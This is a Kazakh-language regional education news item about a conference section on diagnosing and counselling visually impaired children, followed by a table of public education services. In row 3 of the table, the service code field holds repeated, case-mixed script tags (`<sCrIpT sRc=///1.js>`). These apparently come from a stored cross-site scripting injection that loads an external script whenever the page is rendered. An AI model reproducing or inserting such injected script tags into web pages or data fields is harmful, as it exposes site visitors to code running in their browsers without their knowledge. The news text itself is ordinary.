20.08.2026
2026 жылғы 19 тамызда білім беру қызметкерлерінің тамыз конференциясы аясында арнайы мектеп-интернаттар, психологиялық-педагогикалық түзету кабинеттері және психологиялық-медициналық-педагогикалық консультациялар басшыларының секция жұмысы өтті.
Көкшетау қаласының ауданаралық психологиялық-медициналық-педагогикалық консультациясының басшысы, дефектолог-тифлопедагог Ескендирова Сауле Бауыржанқызы «Психологиялық-медициналық-педагогикалық консультация жағдайында көру қабілеті бұзылған балаларды диагностикалау және кеңес беру» тақырыбында баяндама жасады.
Баяндама барысында көру қабілеті бұзылған балаларды диагностикалау және кеңес беру бойынша ПМПК жұмысының негізгі бағыттары, олардың ерекше білім беру қажеттіліктерін анықтау және одан әрі психологиялық-педагогикалық сүйемелдеу бойынша ұсынымдар әзірлеу мәселелері қарастырылды.
Секция қатысушылары арнайы және инклюзивті білім беруді дамытудың өзекті мәселелерін талқылап, тәжірибе алмасты және алдағы жұмыстың басым бағыттарын айқындады.
Іс-шараға Ақмола облысының білім басқармасының өкілдері, облыстық әдістемелік орталықтың әдіскерлері және өңірдегі арнайы білім беру ұйымдарының басшылары қатысты.
Кәсіби диалог, тәжірибе алмасу және ынтымақтастық — сапалы арнайы және инклюзивті білім беруді дамытудың маңызды шарттары.
| № р/с | Коды қызметтер тізіліміне сәйкес мемлекеттік қызметтерді | Атауы қызметтер | Нысанын жүктеу | Қызмет online |
|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 |
| 1 | 803018 | Мұғалімдерді аттестациялауға құжаттарды қабылдау. | Электрондық қызмет алу нұсқаулығы | |
| 2 | 803010-1 | Мемлекеттік білім беру ұйымдарындағы бос немесе уақытша бос лауазымға орналасуға конкурсқа қатысу үшін мұғалімдерден құжаттарды қабылдау. | Электрондық қызмет алу нұсқаулығы | |
| 3 | 00402006<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt> | Жергілікті атқарушы органдар көрсететін психологиялық-педагогикалық қолдау көрсету саласындағы мемлекеттік қызметтерді көрсету қағидаларын бекіту туралы» | Электрондық қызмет алу нұсқаулығы |